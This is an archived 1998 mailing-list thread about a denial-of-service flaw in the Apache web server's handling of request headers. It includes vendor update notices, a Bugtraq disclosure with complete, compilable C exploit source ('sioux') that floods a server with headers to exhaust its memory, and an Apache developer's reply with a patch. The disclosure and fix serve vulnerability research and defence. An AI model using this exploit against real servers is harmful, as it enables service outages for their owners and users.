Russian Apache Switch to English
Switch to Russian koi8-r
windows=1251
cp-866
iso8859-5
Russian Apache Как это работает Рекоммендации Где взять Как установить Как настроить Статус и поддержка
Краткий обзор FAQ Список рассылки Благодарности Поиск по серверу Powered by Russian Apache
Russian Apache mailing list archive (apache-rus@lists.lexa.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[apache-rus] header dos attack



Оно, конечна, не только Russian Apache касается, а вообще всех Apache'й подряд
(невзирая на лица и национальности -- то есть версии), но таки вот.
Exploit -- в Attachment'е, Patch (Quick & Dirty) -- в другом...

-- cut --
A denial-of-service attack against the Apache web server has been found which
lets remote sites disable your web server. This attack does not let remote
users gain any sort of access to your computer, nor does it let local users
gain any special access.

Red Hat recommends upgrading apache on systems which are functioning as
Internet servers. After installing the new apache package, be sure to
restart the apache server as follows:

        /etc/rc.d/init.d/httpd stop
        /etc/rc.d/init.d/httpd start

A fix for the Red Hat Secure Server will be available later this week.

Red Hat 5.0 and 5.1
-------------------
i386:  rpm -Uvh ftp://ftp.redhat.com/updates/5.1/i386/apache-1.2.6-5.i386.rpm
alpha: rpm -Uvh ftp://ftp.redhat.com/updates/5.1/alpha/apache-1.2.6-5.alpha.rpm
SPARC: rpm -Uvh ftp://ftp.redhat.com/updates/5.1/sparc/apache-1.2.6-5.sparc.rpm

Red Hat 4.2
-----------
i386:  rpm -Uvh ftp://ftp.redhat.com/updates/4.2/i386/apache-1.2.5-0.1.i386.rpm
alpha: rpm -Uvh ftp://ftp.redhat.com/updates/4.2/alpha/apache-1.2.5-0.1.alpha.rpm
SPARC: rpm -Uvh ftp://ftp.redhat.com/updates/4.2/sparc/apache-1.2.5-0.1.sparc.rpm
-- cut --

-- cut --
A security problem has been found in apache.  It allows users to crash
the webserver from a remote system, and should be fixed as soon as
possible.

Debian 2.0 and "slink"
- ----------------------

i386:
wget http://ftp1.us.debian.org/debian/security/apache_1.3.1-3_i386.deb
wget http://ftp1.us.debian.org/debian/security/apache-common_1.3.1-3_i386.deb
dpkg -B --install apache_1.3.1-3_i386.deb apache-common_1.3.1-3_i386.deb

alpha:
wget http://ftp1.us.debian.org/debian/security/apache_1.3.1-3_alpha.deb
wget http://ftp1.us.debian.org/debian/security/apache-common_1.3.1-3_alpha.deb
dpkg -B --install apache_1.3.1-3_alpha.deb apache-common_1.3.1-3_alpha.deb

SPARC:
wget http://ftp1.us.debian.org/debian/security/apache-common_1.3.1-3_sparc.deb
wget http://ftp1.us.debian.org/debian/security/apache_1.3.1-3_sparc.deb
dpkg -B --install apache_1.3.1-3_sparc.deb apache-common_1.3.1-3_sparc.deb

automatic upgrades:
Our tier 1 mirrors already have the additional files needed for an automatic
dselect or apt upgrade:
     * http://www.uk.debian.org/debian/ (Europe)
     * http://debian.midco.net/debian/ (South Dakota)
     * http://llug.sep.bnl.gov/debian/ (New York)
     * http://ftp1.us.debian.org/debian/ (Michigan)

NOTE: This will break the libapache-mod-perl and php3 packages
released with Debian 2.0.  A mod_perl DSO suitable for Apache 1.3.1 is
on all mirror sites in the "slink" distribution.
-- cut --

Russian Apache for RedHat 5.1
-----------------------------
i386:  rpm -Uvh ftp://ftp.sch57.msk.ru/pub/redhat-addons/apache-rus/i386/apache-rus-1.3.1rusPL25.9-2.i386.rpm

Russian Apache-SSL for RedHat 5.1
---------------------------------
i386:  rpm -Uvh ftp://ftp.sch57.msk.ru/pub/redhat-addons/apache-rus-ssl/i386/apache-rus-ssl-1.3.1rusPL25.9benSSL1.20-2.i386.rpm


Content-Transfer-Encoding: 8bit
Content-Description: Forwarded message from Dag-Erling Coidan =?ISO-8859-1?Q?Sm=F8rgrav?= <finrod@EWOX.ORG>
Content-Type: text/plain; charset=x-cp866

Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
	by mindcryme.com (8.8.8/8.8.8) with ESMTP id RAA04364
	for <drow@FALSE.ORG>; Fri, 7 Aug 1998 17:33:09 -0400
Received: from netspace.org ([128.148.157.6]:51313 "EHLO netspace.org" ident: "TIMEDOUT2") by brimstone.netspace.org with ESMTP id <75617-10981>; Fri, 7 Aug 1998 16:51:56 -0400
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 1979923 for BUGTRAQ@NETSPACE.ORG; Fri, 7 Aug 1998 16:47:44
          -0400
Approved-By: aleph1@DFW.NET
Received: from niobe.ewox.org (ppp091.uio.no [129.240.240.96]) by netspace.org
          (8.8.7/8.8.7) with ESMTP id NAA23774 for <bugtraq@netspace.org>; Fri,
          7 Aug 1998 13:04:34 -0400
Received: (from finrod@localhost) by niobe.ewox.org (8.8.8/8.8.8) id TAA29309;
          Fri, 7 Aug 1998 19:04:28 +0200 (CEST) (envelope-from finrod)
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Mailer: Gnus v5.3/Emacs 19.34
Message-ID: <861zqspvtw.fsf@niobe.ewox.org>
Date: 	Fri, 7 Aug 1998 19:04:27 +0200
Reply-To: Dag-Erling Coidan =?ISO-8859-1?Q?Sm=F8rgrav?= <finrod@EWOX.ORG>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: Dag-Erling Coidan =?ISO-8859-1?Q?Sm=F8rgrav?= <finrod@EWOX.ORG>
Subject:      YA Apache DoS attack
To: BUGTRAQ@netspace.org

There seems to be a simple way of badly DoSing any Apache server. It
involved a massive memory leak in the way it handles incoming request
headers. I based my exploit on the assumption that they use setenv()
(which they don't) and that the bug occurs when you send a header that
will end up as an environment variable if you request a CGI script
(such as User-Agent), but I have since verified that there is no
connection there. Anyway, you can blow Apache through the roof by
sending it tons of headers - the server's memory consumption seems to
be a steep polynomial of the amount of data you send it. Below is a
snapshot of top(1) about one minute after I sent my server a request
with 10,000 copies of "User-Agent: sioux\r\n" (totalling 190,016 bytes
of data)

---cut---
last pid: 29187;  load averages:  1.82,  1.06,  0.68                   18:21:36
82 processes:  2 running, 80 sleeping
CPU states: 93.5% user,  0.0% nice,  6.1% system,  0.4% interrupt,  0.0% idle
Mem: 82M Active, 5692K Inact, 31M Wired, 4572K Cache, 8349K Buf, 616K Free
Swap: 512M Total, 402M Used, 110M Free, 79% Inuse, 5412K In, 748K Out

  PID USERNAME PRI NICE  SIZE    RES STATE    TIME   WCPU    CPU COMMAND
29176 www      -18   0   392M 85612K swread   0:57  6.83%  6.83% httpd
---cut---

I know that there are many trivial ways of overloading a web server
(e.g. opening tons of connection to eat up file descriptors and
process slots), but this one seemed a little extreme, to say the
least.

Please note that I've only tested this on Apache 1.2.5 and 1.2.6, not
on 1.3.1. However, there is no mention of this bug in the change log
for 1.3.1, so I'll assume it's vulnerable.

BTW, how can the Apache team be stupid enough not to provide a way of
submitting problem reports by email? If they did, I'd've sent this to
them first and given them a week, but they don't and I'm too friggin'
lazy to use their web interface...

Here's the 'sploit for the script kiddies. It should compile cleanly
and work on most Unices. These are the ones I've tested it on:

FreeBSD 2.2.x, FreeBSD 3.0, IRIX 5.3, IRIX 6.2:
  gcc -o sioux sioux.c

Solaris 2.5.1:
  gcc -o sioux sioux.c -lsocket -lnsl


---cut---
/*-
 * Copyright (c) 1998 Dag-Erling CoОdan SmЬrgrav
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer
 *    in this position and unchanged.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote products
 *    derived from this software withough specific prior written permission
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 *
 */

/*
 * Kudos to Mark Huizer who originally suggested this on freebsd-current
 */

#include <sys/types.h>

#include <sys/socket.h>
#include <netinet/in.h>

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void
usage(void)
{
    fprintf(stderr, "usage: sioux [-a address] [-p port] [-n num]\n");
    exit(1);
}

int
main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    struct hostent *he;
    FILE *f;
    int o, sd;

    /* default parameters */
    char *addr = "localhost";
    int port = 80;
    int num = 1000;

    /* get options */
    while ((o = getopt(argc, argv, "a:p:n:")) != EOF)
        switch (o) {
        case 'a':
            addr = optarg;
            break;
        case 'p':
            port = atoi(optarg);
            break;
        case 'n':
            num = atoi(optarg);
            break;
        default:
            usage();
        }

    if (argc != optind)
        usage();

    /* connect */
    if ((he = gethostbyname(addr)) == NULL) {
        perror("gethostbyname");
        exit(1);
    }
    bzero(&sin, sizeof(sin));
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family = he->h_addrtype;
    sin.sin_port = htons(port);

    if ((sd = socket(sin.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket");
        exit(1);
    }

    if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
        perror("connect");
        exit(1);
    }

    if ((f = fdopen(sd, "r+")) == NULL) {
        perror("fdopen");
        exit(1);
    }

    /* attack! */
    fprintf(stderr, "Going down like a plague of locusts on %s\n", addr);
    fprintf(f, "GET / HTTP/1.1\r\n");
    while (num-- && !ferror(f))
        fprintf(f, "User-Agent: sioux\r\n");

    if (ferror(f)) {
        perror("fprintf");
        exit(1);
    }

    fclose(f);
    exit(0);
}
---cut---

DES
--
Dag-Erling SmЬrgrav -- finrod@ewox.org

Return-Path: new-httpd-owner-johnie=netgod.net@apache.org 
Received: from localhost (johnie@localhost [127.0.0.1])
	by netgod.net (8.9.1/8.9.1/Debian/GNU) with ESMTP id VAA02253
	for <johnie@localhost>; Fri, 7 Aug 1998 21:41:07 -0400
Received: from mercury.alloy.net
	by fetchmail-4.5.5 IMAP
	for <johnie/localhost> (single-drop); Fri, 07 Aug 1998 21:41:07 EDT
Received: from hyperreal.org (taz.hyperreal.org [209.133.83.16])
	by mercury.alloy.net (8.9.1/ALLOY) with SMTP id TAA19800
	for <johnie@netgod.net>; Fri, 7 Aug 1998 19:05:53 -0400 (EDT)
Received: (qmail 4335 invoked by uid 6000); 7 Aug 1998 23:05:47 -0000
Received: (qmail 4323 invoked from network); 7 Aug 1998 23:05:45 -0000
Received: from eastwood.aldigital.algroup.co.uk (194.128.162.193)
  by taz.hyperreal.org with SMTP; 7 Aug 1998 23:05:45 -0000
Received: from freeby.ben.algroup.co.uk (freeby.ben.algroup.co.uk [193.133.15.6]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id XAA12444; Fri, 7 Aug 1998 23:04:51 GMT
Received: from algroup.co.uk (naughty.ben.algroup.co.uk [193.133.15.107]) by freeby.ben.algroup.co.uk (8.6.12/8.6.12) with ESMTP id AAA08630; Sat, 8 Aug 1998 00:04:48 +0100
Message-ID: <35CB87F5.C6F23650@algroup.co.uk>
Date: Sat, 08 Aug 1998 00:04:21 +0100
From: Ben Laurie <ben@algroup.co.uk>
Organization: A.L. Group plc
X-Mailer: Mozilla 4.05 [en] (WinNT; I)
MIME-Version: 1.0
To: "Dag-Erling Coidan Sm°rgrav" <finrod@EWOX.ORG>
CC: BUGTRAQ@netspace.org, Apache List <new-httpd@apache.org>
Subject: Re: YA Apache DoS attack
References: <861zqspvtw.fsf@niobe.ewox.org>
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: new-httpd-owner@apache.org
Precedence: bulk
Reply-To: new-httpd@apache.org
Status: RO
X-Status: 

Dag-Erling Coidan Sm°rgrav wrote:
> I know that there are many trivial ways of overloading a web server
> (e.g. opening tons of connection to eat up file descriptors and
> process slots), but this one seemed a little extreme, to say the
> least.

This is O(n^2) and therefore a Bad Thing(tm), that I will agree with.

> Please note that I've only tested this on Apache 1.2.5 and 1.2.6, not
> on 1.3.1. However, there is no mention of this bug in the change log
> for 1.3.1, so I'll assume it's vulnerable.
> 
> BTW, how can the Apache team be stupid enough not to provide a way of
> submitting problem reports by email? If they did, I'd've sent this to
> them first and given them a week, but they don't and I'm too friggin'
> lazy to use their web interface...

security@apache.org

> Here's the 'sploit for the script kiddies. It should compile cleanly
> and work on most Unices. These are the ones I've tested it on:

And here's a band-aid for 1.3.1 - I'm sure we'll come up with something better
soon. This (untested) patch should prevent the worst effects. A similar patch
should work for 1.2.x.

Index: http_protocol.c
===================================================================
RCS file: /export/home/cvs/apache-1.3/src/main/http_protocol.c,v
retrieving revision 1.229
diff -u -r1.229 http_protocol.c
--- http_protocol.c     1998/08/06 17:30:30     1.229
+++ http_protocol.c     1998/08/07 23:02:56
@@ -714,6 +714,7 @@
     int len;
     char *value;
     char field[MAX_STRING_LEN];
+    int nheaders=0;
 
     /*
      * Read header lines until we get the empty separator line, a read error,
@@ -723,6 +724,11 @@
         char *copy = ap_palloc(r->pool, len + 1);
         memcpy(copy, field, len + 1);
 	
+        if(++nheaders == 100) {
+           r->status = HTTP_BAD_REQUEST;
+           return;
+	}
+          
 	if (!(value = strchr(copy, ':'))) {     /* Find the colon separator */
 	    /* if there's none, this request is screwed up.
 	     * a hack to deal with how we set HTTP_REQUEST_TIME_OUT earlier.*/

Cheers,

Ben.

-- 
Ben Laurie            |Phone: +44 (181) 735 0686| Apache Group member
Freelance Consultant  |Fax:   +44 (181) 735 0689|http://www.apache.org/
and Technical Director|Email: ben@algroup.co.uk |
A.L. Digital Ltd,     |Apache-SSL author     http://www.apache-ssl.org/
London, England.      |"Apache: TDG" http://www.ora.com/catalog/apache/

WE'RE RECRUITING! http://www.aldigital.co.uk/recruit/





Спонсоры сайта:

[ Russian Apache ] [ Как это работает ] [ Рекомендации ] [ Где взять ] [ Как установить ] [ Как настроить ] [ Статус и поддержка ] [ Краткий обзор ] [ FAQ ] [ Список рассылки ] [ Благодарности ] [ Поиск по серверу ] [ Powered by Russian Apache ] [ Apache-talk archive ]

"Russian Apache" includes software developed by the Apache Group for use in the Apache HTTP server project (http://www.apache.org/) See Apache LICENSE.
Copyright (C) 1995-2001 The Apache Group. All rights reserved.
Copyright (C) 1996 Dm. Kryukov; Copyright (C) 1997-2009 Alex Tutubalin. Design (C) 1998 Max Smolev.